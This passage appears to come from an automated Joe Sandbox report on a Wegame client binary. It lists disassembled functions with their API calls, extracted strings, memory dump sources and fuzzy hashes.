                                                                • Opcode ID: bf672cd6a39128759ffb51c159f8c4ca71e46508c31f10394eb3e0b4572c4d03
                                                                • Instruction ID: 44b4565bf47d4dbf122f59d23064cb1e95ec08f8441c3609c785f2e1fea5c37c
                                                                • Opcode Fuzzy Hash: bf672cd6a39128759ffb51c159f8c4ca71e46508c31f10394eb3e0b4572c4d03
                                                                • Instruction Fuzzy Hash: B941E770900248DFDF14EB61C855BEEBBB1AF09308F5480DEE445A7282DB785F48CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00446857 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446861
                                                                  • Part of subcall function 00441F84: __EH_prolog3.LIBCMT ref: 00441F8B
                                                                • _Copy_construct_from.LIBCPMT ref: 00446997
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                • Opcode ID: c7e88d717828149a750f00832c8c4daea04fc4aad89d08c0a1fb7cf11f075731
                                                                • Instruction ID: 587158272673e0fea047525d70b9ae90c6cca4a3cab42998452ef77bf0c486dc
                                                                • Opcode Fuzzy Hash: c7e88d717828149a750f00832c8c4daea04fc4aad89d08c0a1fb7cf11f075731
                                                                • Instruction Fuzzy Hash: 4E41F970900248DFDF14EB61C855BEEBBB1AF09308F5480DEE045AB282DB785F48CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004469ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004469F7
                                                                  • Part of subcall function 00441FDC: __EH_prolog3.LIBCMT ref: 00441FE3
                                                                • _Copy_construct_from.LIBCPMT ref: 00446B2D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                • Opcode ID: 2c7ba406dcc7abdc519f2bb6764e675406e29a7abc5e7166f260a3d0e0353b1e
                                                                • Instruction ID: a9fd9b868506808f0988e9e2b4822116481d7d0a2a70c6a9b432a6b8bc0d63d9
                                                                • Opcode Fuzzy Hash: 2c7ba406dcc7abdc519f2bb6764e675406e29a7abc5e7166f260a3d0e0353b1e
                                                                • Instruction Fuzzy Hash: 0B41D770900258DEDF14EB61C855BEEBBB1AF0A308F5480DEE045B7292DB785F48CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00446B83 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446B8D
                                                                  • Part of subcall function 004420DB: __EH_prolog3.LIBCMT ref: 004420E2
                                                                • _Copy_construct_from.LIBCPMT ref: 00446CC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                • Opcode ID: 0f8ea240e1275d340e4d41f7c6392e1e521aa79030176780c80c359618d2a09b
                                                                • Instruction ID: 96cba344344cc87be2579f4a3bc68c3722650790595800728af4f67a195be416
                                                                • Opcode Fuzzy Hash: 0f8ea240e1275d340e4d41f7c6392e1e521aa79030176780c80c359618d2a09b
                                                                • Instruction Fuzzy Hash: 2F41E870900248DEDF14EB71C855BEEBBB1AF0A308F5440DEE049A7282DB785F48CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00446D19 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446D23
                                                                  • Part of subcall function 00441D80: __EH_prolog3.LIBCMT ref: 00441D87
                                                                • _Copy_construct_from.LIBCPMT ref: 00446E59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                • Opcode ID: 02552ddd842ea046dec74f55db2294d99067367fa77b371bfcadf6ec4d207f25
                                                                • Instruction ID: 5f40d5e3d2769eb5734f13b28944f3c3b6abc17b240f03e39a2c293760950887
                                                                • Opcode Fuzzy Hash: 02552ddd842ea046dec74f55db2294d99067367fa77b371bfcadf6ec4d207f25
                                                                • Instruction Fuzzy Hash: FB41FA70900258DFDF14EB65C855BEEBBB1AF09308F5440DEE149A7282DB785F44CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00446EAF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446EB9
                                                                  • Part of subcall function 00441F2F: __EH_prolog3.LIBCMT ref: 00441F36
                                                                • _Copy_construct_from.LIBCPMT ref: 00446FEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                • Opcode ID: 4bc1360520e11abcde85e4b341a2e2c723a9b7ee49596cdc9fbac0bcaf3e8d36
                                                                • Instruction ID: b0a077d832d28bddbc3a9de6106e52f00e8138592f46ab10dbe269bb84a53b90
                                                                • Opcode Fuzzy Hash: 4bc1360520e11abcde85e4b341a2e2c723a9b7ee49596cdc9fbac0bcaf3e8d36
                                                                • Instruction Fuzzy Hash: 2041E670901248DEDF14EB71C855BEEBBB1AF09308F5480DEE049A7282DB785F48CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00452EE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00452EE7
                                                                • __RTDynamicCast.VCRUNTIME140(?,00000000,004A4A68,004A6A98,00000000,85A35C35,?,?,?,?,?,00474A2F,000000FF), ref: 00452FB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CastDynamicH_prolog3
                                                                • String ID: 73E
                                                                • API String ID: 1542823071-750320168
                                                                • Opcode ID: a767413909af096a515dc3ff37d49565ceb320525922476cc24f5a16689ce66a
                                                                • Instruction ID: eeb56198103ded98d94755b407a3ddfeec9f99ccdc2d2b3ffebe303f20992a00
                                                                • Opcode Fuzzy Hash: a767413909af096a515dc3ff37d49565ceb320525922476cc24f5a16689ce66a
                                                                • Instruction Fuzzy Hash: 3D31D0B2600204AFDB10CF65C981BAAB7F9FB45714F10452FF84AC7241DBB8AD04C758
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00452E0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00452E14
                                                                  • Part of subcall function 0046B4D1: __EH_prolog3_GS.LIBCMT ref: 0046B4D8
                                                                • _CxxThrowException.VCRUNTIME140(00000008,0049C0FC,00000000,00000008), ref: 00452E7F
                                                                Strings
                                                                • format specifier '{}' requires signed argument, xrefs: 00452E4C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$ExceptionThrow
                                                                • String ID: format specifier '{}' requires signed argument
                                                                • API String ID: 478813208-2116603712
                                                                • Opcode ID: b5876d2c27dad80efa92f6dc624d3ed026cd11a64b40dbae5334de65ed9b658a
                                                                • Instruction ID: 3530882dfa9912b55f80ff8c92688c714c71271be30428fdf2b782a382c732c9
                                                                • Opcode Fuzzy Hash: b5876d2c27dad80efa92f6dc624d3ed026cd11a64b40dbae5334de65ed9b658a
                                                                • Instruction Fuzzy Hash: D9112B35504108AFCF10DFA5D5429EE7B75EF06316F14801FFC1457213DB78A94A879A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0044E37C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • WideCharToMultiByte.KERNEL32(0000000F,00000000,?,00000001,00000000,00000000,00000000,00000000,(null),00000006,85A35C35,?,?,?,?,00476AFD), ref: 0044E3E3
                                                                • WideCharToMultiByte.KERNEL32(00000010,00000000,?,00000001,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00476AFD,000000FF), ref: 0044E40F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$memmove
                                                                • String ID: (null)
                                                                • API String ID: 787594944-3941151225
                                                                • Opcode ID: 2f567bb1d24361cc1d4b9be72231fc7387d8e633346353f02b09748f500ff85a
                                                                • Instruction ID: b31337488b65670b8edeec67ce0f734928e9a4e47a78c2f893db1ae4e7a356c1
                                                                • Opcode Fuzzy Hash: 2f567bb1d24361cc1d4b9be72231fc7387d8e633346353f02b09748f500ff85a
                                                                • Instruction Fuzzy Hash: 52117CB1600258BFEB258F59CC85FABBBBDFB08754F10852EB91597280D3B59D008B64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00462373 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046237A
                                                                  • Part of subcall function 004590D4: __EH_prolog3.LIBCMT ref: 004590DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID: ^tgp_(.*)_0n$$^wegamesetup(.*)
                                                                • API String ID: 431132790-3769506146
                                                                • Opcode ID: bdfa71cd330b3d963235f46c039802dbd4967dad25aa24eba6136da548754912
                                                                • Instruction ID: df75ccbfd1639e9a25885cdb793eb5409e21109f4469cf1a48567d8a927de989
                                                                • Opcode Fuzzy Hash: bdfa71cd330b3d963235f46c039802dbd4967dad25aa24eba6136da548754912
                                                                • Instruction Fuzzy Hash: 8111A070C00318AADB10EF629D46AEEBB74EF50760F04060BAC21673D2DBB90E45C789
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00468B66 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,00000008,?,?,?,00453337), ref: 00468B70
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,00453337), ref: 00468BAA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@?pptr@?$basic_streambuf@
                                                                • String ID: 73E
                                                                • API String ID: 2127219216-750320168
                                                                • Opcode ID: 515eda75c96cd0655def1978f1681c8a7cd632997408b014fb9e2ce0ef88a1fa
                                                                • Instruction ID: 3ebdd8a0a27ebe9b89d86458a6ee92d8e6d24bb8c842612a73ba53047e8ec967
                                                                • Opcode Fuzzy Hash: 515eda75c96cd0655def1978f1681c8a7cd632997408b014fb9e2ce0ef88a1fa
                                                                • Instruction Fuzzy Hash: 0911F5B5A002008FC7109F2AC849D5AFBF9AF94750756868BD405CB372DBB0E941CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046478A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000044), ref: 0046479B
                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004647CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessmemset
                                                                • String ID: D
                                                                • API String ID: 2296119082-2746444292
                                                                • Opcode ID: ad49d06eb3791e69eef6a048262665f0756d0032147fffbe869165ef71457d06
                                                                • Instruction ID: 4a18fe74b27f85181bd26444a616de4e9f7ec9d0ac9009bcdcefae17f725ad7a
                                                                • Opcode Fuzzy Hash: ad49d06eb3791e69eef6a048262665f0756d0032147fffbe869165ef71457d06
                                                                • Instruction Fuzzy Hash: 0CF0FEB1500508BFEB44DBE8DD89DAB77BDEF44708F004429E216DA154E778AD488666
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045E9D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E9D9
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • clear_log_file, exception = [%s], xrefs: 0045EA22
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E9FD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@
                                                                • String ID: clear_log_file, exception = [%s]$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 750329627-2335837964
                                                                • Opcode ID: 555d4791d059acad6ee0002b3ddac6b01ead825ac6bc108b7fa2a7f2055b7272
                                                                • Instruction ID: 9e38855e06d34f2860ef0dbba312a8a61f462360586daefcef486d93475e9969
                                                                • Opcode Fuzzy Hash: 555d4791d059acad6ee0002b3ddac6b01ead825ac6bc108b7fa2a7f2055b7272
                                                                • Instruction Fuzzy Hash: BAF0F031E40610ABCB25E625CC42FAE6321AF25709F6441C9F9052B7C2DB795F09CB89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046A439 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046A439
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • [App]std::exception in get_version!, xrefs: 0046A474
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0046A45D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@
                                                                • String ID: [App]std::exception in get_version!$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 750329627-2599211935
                                                                • Opcode ID: 41b91eff65aaf9426287f7595ddcbb61134116a863265c5434c808a43d32337a
                                                                • Instruction ID: 471e7dfac0c7ed14696ef5b9ef139169a47914d050adb6cfd3af5404e0bafd50
                                                                • Opcode Fuzzy Hash: 41b91eff65aaf9426287f7595ddcbb61134116a863265c5434c808a43d32337a
                                                                • Instruction Fuzzy Hash: 4FF02420E01740AAD711E6288C96F9E67108F25708F9080AEE5403B3C2EEAC4E15CF9F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045C85C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?uncaught_exception@std@@YA_NXZ.MSVCP140(85A35C35,00000000,?,00000000,00479146,000000FF,73E,00451550), ref: 0045C889
                                                                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(85A35C35,00000000,?,00000000,00479146,000000FF,73E,00451550), ref: 0045C894
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@
                                                                • String ID: 73E
                                                                • API String ID: 888405505-750320168
                                                                • Opcode ID: c20509fc4cfc2b668ff5a53d2ccd44dc7dfdca9b1aa16dd1f7ee0c52adc8fbd1
                                                                • Instruction ID: 77a5459194036d831d7c76103f337c50202e87b199e21d40ab2bfb783d40b9e8
                                                                • Opcode Fuzzy Hash: c20509fc4cfc2b668ff5a53d2ccd44dc7dfdca9b1aa16dd1f7ee0c52adc8fbd1
                                                                • Instruction Fuzzy Hash: E9F0E272904604EFDB14DF58C941B9DB7F8EB49725F10436EE862932C0EB782A008A98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

